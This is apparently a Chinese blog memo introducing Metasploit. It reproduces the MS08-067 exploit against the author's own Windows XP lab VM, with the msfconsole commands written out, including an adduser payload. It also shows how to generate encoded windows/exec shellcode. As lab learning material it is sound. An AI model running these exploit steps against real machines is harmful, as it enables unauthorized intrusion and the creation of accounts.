MetaSploit入门

最新推荐文章于 2022-11-20 15:45:29 发布
最新推荐文章于 2022-11-20 15:45:29 发布
阅读量909 收藏 1
点赞数
分类专栏: security 文章标签: MetaSploit exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tjhd1989/article/details/8782614
版权

简单的使用了一下MetaSploit,作个备忘,有需要的时候再系统学习下。

MetaSploit下载地址:https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

我下的最新版本号为4.4.0-dev,集成了840 exploits - 495 auxiliary - 250 payloads - 27 encoders - 8 nops

默认安装的东西如下图:



其中Access MetaSploit Web UI配置漏洞一直没有搞明白,所以下面使用的是MetaSploit Console,反正命令也少,使用也比较简单。

另外,Framework  MSFGUI提供了很好的图形界面,貌似是联网更新的实时数据,可用exploit和payload都比Console下面多。

----------------------

目标:重现漏洞ms08_067_netapi的利用过程

虚拟机:Windows XP SP2

主机:Windows 7

进入Console后,输入?或help可以查看可用的命令

重现漏洞利用的命令如下:

使用漏洞

use exploit/windows/smb/ms08_067_netapi

设置payload为添加新用户
set payload windows/adduser

查看要设置的参数

show options

下图显示可以设置的模块参数有RHOST,RPORT,SMBPIPE,payload参数有EXITFUNC,USER,PASS,只需要设置部分参数。


设置远程主机ip,即Winsow XP的ip
set RHOST 192.168.1.102
显示漏洞可攻击的目标
show targets
设置目标为17,即Windows XP SP2 Chinese - Simplified (NX)
set target 17
漏洞利用攻击
exploit
----------------
之后在虚拟机就可以看到新增了的用户metasploit,当然这是默认的新增用户名和密码,在漏洞利用攻击前可以改成别的。

------------------------------分割线---------------------------------------------------------------

利用MetaSploit产生shellcode

打开msfgui,选择Payloads,可以看到针对不同系统和不用语言的选项


选择windows/exec后,弹出如下配置窗口


可以配置要执行的命令(图中为计算器calc)、退出方式

选display,可以直接看到没经过处理的shellcode,会有坏字符'\x00'

选encode编码后,可以配置输出路径、编码器、输出格式,要过滤的坏字符等,点击"Geneate"查看输出文件就可以看到shellcode


tjhd1989
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit入门
田田云逸的博客
11-10 2990
Metasploit Windows哈希值检测命令 ​ certutil /? 查看帮助 渗透测试 ​ 黑盒测试:设计为模拟一个对客户组织一无所知的攻击者所进行的渗透攻击。 ​ 白盒测试:在拥有客户组织所有知识的情况下所进行的渗透测试。 ​ 灰盒测试:黑盒和白盒两者结合 POC:渗透攻击代码POC 0day:0day泛指所有在官方发布该作品之前或者当天,该文件主要包括发布小组的信息、发布作品的信息、破解信息等。 渗透测试框架软件 搜索公开渗透测试代码–》编译–》测试–》修改代码–》实施–》失败–》
Metasploit入门教程
weixin_30580943的博客
07-28 718
0.Metasploit简介 Metasploit是一款开源的渗透测试框架平台,到目前为止,msf已经内置了数千个已披露的漏洞相关的模块和渗透测试工具,模块使用ruby语言编写,这使得使用者能够根据需要对模块进行适当修改,甚至是调用自己写的测试模块。选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。 1.Metasploit...
Metasploit入门使用手册
m0_67392126的博客
03-21 2088
Metasploit基础 Metasploit使用的数据库是posetpresql,在msf5之前启动的话需要安装数据库格式化数据库,设置用户和密码去进行连接,而在msf5之后不需要在这样操作,只需在kali的命令行中使用msfdb init就可以初始化并开启msf的数据库,然后在输入msfconsole就可以启动msf,进入之后我们可以使用db_status来进行查看连接数据库的状态。除此在外我们还可以使用kage实现界面话。 1.msf目录结构 在kali当中默认安装,文件路径是在/usr/sha
metasploit入门
发蝴蝶和大脑斧的博客
04-07 369
1。nmap扫描目标主机,发现开启的服务和版本,当有防火墙时可用-sV或-P0 2。msfconsole中search “服务名称”,找到对应的模块 3。use “模块全名” 4。info,查看模块详情 5。show payloads,查看可用payloads 6。set payload “payload名” 7。options,显示参数,然后set必要的参数 8。exploit,执行 ...
Metasploit入门用法(主动攻击)
qq_50854662的博客
05-29 3673
–作者:CV 本文主要讲metasploit入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。 由于我现在对metasploit的深入度并不足,只能使用metasploit做一些初级入门的系统测试,一下是常规步骤和方法: 1、 使用nmap进行端口扫描 2、 使用search命令查找相关模块 3、 使用use调度模块 4、 使用info查看模.
Metasploit新手入门
xlsj雪松的博客
08-23 703
1 MSF终端 再命令行输入msfconsole 1.1 信息收集 1.1.1数据库使用 我们对这台Windows虚拟机使用oX选项进行扫描,生成一个名为Subnetl.xml的文件 nmap -Pn -sS -A -oX Subnet1 192.168.1.0/24 使用db_ import 命令将文件导入到数据库中;用db_ hosts 命令核实导入的结果 msf > ...
Metasploit入门用法
最新发布
wusimin432503的博客
11-20 341
Metasploit入门用法
Metasploit入门上手
A1andNS's Blog
10-24 655
Metasploit入门上手 今天是2019年10月24日打卡嘀嘀嘀!!!菜鸟卡!!一起学习进步!!! Metasploit简单使用流程
[转]Metasploit入门用法(主动攻击)
tpriwwq的专栏
05-23 769
原文:https://blog.csdn.net/wsh19930305/article/details/72855660 本文主要讲metasploit入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。 由于我现在对metasploit的深...
Metasploit入门详解
NoobMaster的博客
02-23 614
–作者:CV 本文主要讲metasploit入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。 由于我现在对metasploit的深入度并不足,只能使用metasploit做一些初级入门的系统测试,一下是常规步骤和方法: 1、 使用nmap...
metasploit入门用法
06-03
### Metasploit 入门用法详解 #### 一、Metasploit简介 Metasploit是一款功能强大的渗透测试工具,广泛应用于信息安全领域。它能够帮助安全专家发现安全漏洞,评估网络安全状况,以及进行渗透测试。Metasploit的...
metasploit入门视频教程
10-09
本视频提供了metasploit的使用的入门教程,有完全的教学视频过程,演示与结果。
Metasploit's Guide
07-19
无论目标是保护自己的网络还是对别人的网络进行测试,《Metasploit: 渗透测试者指南》都将带领读者深入理解Metasploit并超越入门阶段。这本书由Metasploit项目的创始人HDMoore作序,并由David Kennedy、Jim O’...
Mastering Metasploit 2nd Edition
05-14
”这句描述指明了本书是为初学者设计的,适合那些希望入门或进一步提高自己在Metasploit方面的知识和技能的人。它不仅适用于新手,对于有一定基础但想要深入学习的人来说也是一个不错的选择。 #### 标签解析 - **...
BT5 metasploit入门到精通[视频课程].txt打包整理.zip
03-06
BT5 metasploit入门到精通[视频课程].txt打包整理.zip
QEMU简单教程(不断更新中...)
12-02 7843
QEMU是一个开源的虚拟机和模拟器,由法国天才程序员Fabrice Bellard  所开发,可以模拟不同的处理器架构(x86,server and embedded PowerPC, and S390 guests)。官网为 http://wiki.qemu.org/Main_Page KVM是构建在QEMU之上的虚拟机,其本身主要是一个Linux内核模块,只不过了整合了QEMU,目前受到
利用virustotal公共API获取病毒样本扫描结果
04-26 2870
virustotal.com网站允许用户上传恶意样本,然后返回46个病毒扫描器的扫描报告。 利用virustotal.com网站提供的公共API,可以编写python脚本自动获取这个扫描报告。 官方网站就有详细的教程 https://www.virustotal.com/en/documentation/public-api/ 首先要注册一个帐号,登录后在帐号Profile下可以发现
Windows下使用二进制插装工具Pin
11-04 2350
Pin是Intel公司提供的一个程序插装工具,支持IA-32,Intel(R) 64和IA64架构上的Linux和Windows可执行程序。 Pin允许一个工具在可执行程序的任何地方插入任意代码(用C或C++编写)。这些代码在程序运行的时候动态添加(修改内存映像)。这也使得可以将Pin附加到进程上。 下载地址:http://software.intel.com/en-us/articles/p
TEMU和Vine的简单用法
11-16 1877
TEMU的用法 首先要创建一个虚拟的系统 qemu-img create -f qcow2 /opt/kvm/winxp.img 10G 创建格式为qcow2大小为10G的虚拟磁盘文件 sudo qemu-system-i386 -hda /opt/kvm/winxp.img -cdrom /opt/kvm/winxp_sp2.iso -boot d  根据镜像iso文件在winxp.img
Metasploit入门指南:从零开始
"《最简metasploit手册》是一份由Scott Morris编写的指南,旨在...《最简metasploit手册》是一本适合初学者入门的教程,它以实践为主,结合具体案例,让读者能够在实际操作中掌握Metasploit的基本用法和渗透测试流程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值